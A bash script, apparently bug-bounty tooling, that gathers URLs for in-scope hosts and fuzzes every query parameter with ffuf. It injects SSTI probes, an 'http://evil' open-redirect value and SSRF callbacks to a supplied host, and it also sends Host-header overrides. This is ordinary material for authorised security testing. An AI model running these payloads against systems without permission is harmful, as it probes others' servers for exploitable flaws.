#!/bin/bash
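#######################################
# Build the URL wordlists under ./url from the hosts listed in ./scope.
# Reads:   ./scope in the starting directory (one target per line, fed to gau)
# Writes:  url/url       - de-duplicated URLs with static assets dropped
#          url/url.param - URLs that contain "="
# Outputs: collected URLs, parameterised URLs and unique paths on stdout
# Side effect: leaves the shell inside ./url; the fuzzing steps rely on that.
# Returns: 1 if ./scope is unreadable or ./url cannot be created or entered
#######################################
function create_wl() {
  if [ ! -r scope ]; then
    echo "create_wl: cannot read ./scope" >&2
    return 1
  fi
  mkdir -p url || return 1
  # Stop here rather than write wordlists into whatever directory we are in.
  cd url || return 1
  # get urls
  #cat ../scope |waybackurls |tee -a url
  gau -subs < ../scope | tee -a url
  # Drop static assets. The dot is part of the pattern so only real file
  # extensions are filtered, and "jpeg" replaces the misspelt "jpej" that let
  # every .jpeg URL through.
  grep -viE '\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)$' url \
    | sort -u -o url
  # get url with parameters
  grep "=" url | tee -a url.param
  unfurl -u paths < url
}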
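#######################################
# Make sure the wordlists exist and that the shell is inside ./url.
# Globals: URL_WL_READY (written) - set once ./url has been entered
# Behaviour:
#   - no ./url directory: remove stale url / url.param entries, run create_wl
#   - ./url exists: enter it and regenerate url.param from the url list
# Returns: 1 if ./url exists but cannot be entered, 0 otherwise
#######################################
function verify() {
  # An earlier option in the same run already moved us into ./url. From in
  # there "url" is the wordlist file, not a directory, so the test below
  # would take the rebuild path and delete the collected list.
  if [ -n "${URL_WL_READY:-}" ]; then
    return 0
  fi
  if [ ! -d url ]; then
    # "2>" rather than "2&>": the latter passes a literal "2" to rm as a
    # path and removes any file of that name.
    rm -rf url url.param 2> /dev/null
    create_wl
  else
    # Enter the directory whenever it exists; the old test only did so when
    # url.param was already present, leaving callers in the wrong directory.
    cd url || return 1
    grep "=" url > url.param
  fi
  URL_WL_READY=1
}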
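#######################################
# Replace every query-string value with a template-expression marker and
# report the URLs whose response contains the evaluated result.
# Reads:   url.param (prepared by verify)
# Writes:  url.ssti (request list), ssti.result (ffuf output)
# Outputs: the generated request list on stdout, then ffuf's own output
#######################################
function ssti() {
  verify
  # create ssti template
  # "2&>" passed a literal "2" to rm as a path; -f is already quiet about a
  # missing file, so no redirection is needed.
  rm -rf -- url.ssti
  qsreplace "ssti{{7*7}}" < url.param | tee -a url.ssti
  sort -u -o url.ssti url.ssti
  # "ssti49" only appears when the server evaluated the expression; a plain
  # reflection of the input still reads "ssti{{7*7}}".
  ffuf -u FUZZ -w url.ssti -t 30 -mr "ssti49" -o ssti.result
}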
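#######################################
# Replace every query-string value with an external URL marker and report
# the URLs whose response contains that marker.
# Reads:   url.param (prepared by verify)
# Writes:  url.redirect (request list), open_redirect.result (ffuf output)
# Outputs: the generated request list on stdout, then ffuf's own output
#######################################
function open_redirect() {
  # One marker for both the injected value and the response matcher. They
  # used to differ ("http://evil" injected, "evil.com" matched), so the
  # matcher could never see the value that was sent.
  local marker="http://evil"
  verify
  # "2&>" passed a literal "2" to rm as a path; -f needs no redirection.
  rm -rf -- url.redirect
  # create open redirect template
  qsreplace "$marker" < url.param | tee -a url.redirect
  sort -u -o url.redirect url.redirect
  # -mr is a regex match on the response, so a hit only shows the marker came
  # back somewhere; check that it is the redirect target before reporting.
  ffuf -u FUZZ -w url.redirect -t 30 -mr "$marker" -o open_redirect.result
}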
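#######################################
# Replace every query-string value with http://<callback host> and request
# each resulting URL. Nothing is matched in the responses; evidence has to be
# read from the callback host's own logs.
# Arguments: $1 - callback host, without scheme
# Reads:   url.param (prepared by verify)
# Writes:  url.ssrf (request list), ssrf.result (ffuf output)
# Returns: 2 if no callback host was given
#######################################
function ssrf() {
  # An empty host would send "http://" in every parameter: a full run of
  # requests that can never produce a callback.
  if [ -z "${1:-}" ]; then
    echo "ssrf: callback host required" >&2
    return 2
  fi
  verify
  # "2&>" passed a literal "2" to rm as a path; -f needs no redirection.
  rm -rf -- url.ssrf
  # create ssrf template
  qsreplace "http://$1" < url.param | tee -a url.ssrf
  sort -u -o url.ssrf url.ssrf
  ffuf -u FUZZ -w url.ssrf -t 30 -o ssrf.result
}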
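#######################################
# Request every collected URL with the Host header overridden.
# Arguments: $1 - value to send in the Host header
# Reads:   the url wordlist: ./url when run from inside the url directory,
#          ./url/url when run from the directory that contains it
# Writes:  host.result (ffuf output) in the current directory
#######################################
function host() {
  local wordlist=./url
  # When this is the first option, nothing has entered the url directory yet
  # and ./url is that directory rather than the list inside it.
  if [ -d url ]; then
    wordlist=./url/url
  fi
  # Own output file: this used to write ssrf.result and overwrite the SSRF
  # run's results.
  ffuf -u FUZZ -w "$wordlist" -H "Host: $1" -t 30 -o host.result
}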
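#######################################
# Print the option summary to stdout.
# Lists every option the getopts string accepts; -H was previously missing.
# "(require)" marks options that take an argument.
#######################################
function help() {
  printf '%s\n' "usage:"
  printf '\t %s \t %s\n' s "ssrf (require)"
  printf '\t %s \t %s\n' H "host header (require)"
  printf '\t %s \t %s\n' t "ssti"
  printf '\t %s \t %s\n' o "open redirect"
}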
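# Dispatch each command-line option to its check.
#   -s HOST and -H VALUE take an argument and continue with the next option.
#   -t and -o run their check and then end the script.
# Every exit below uses status 1, including after a completed -t or -o run,
# so the exit status does not tell a caller whether the check succeeded.
while getopts ":s:H:to" OPTION; do
  case "$OPTION" in
    s)
      ssrf "$OPTARG"
      ;;
    H)
      # Function names are case-sensitive: the function is "host", and the
      # old "Host" call failed with "command not found".
      host "$OPTARG"
      ;;
    t)
      ssti
      exit 1
      ;;
    o)
      # The function is open_redirect; "open.redirect" is not a defined name.
      open_redirect
      exit 1
      ;;
    : | \?)
      # Missing argument (:) or unknown option (?).
      help
      exit 1
      ;;
  esac
done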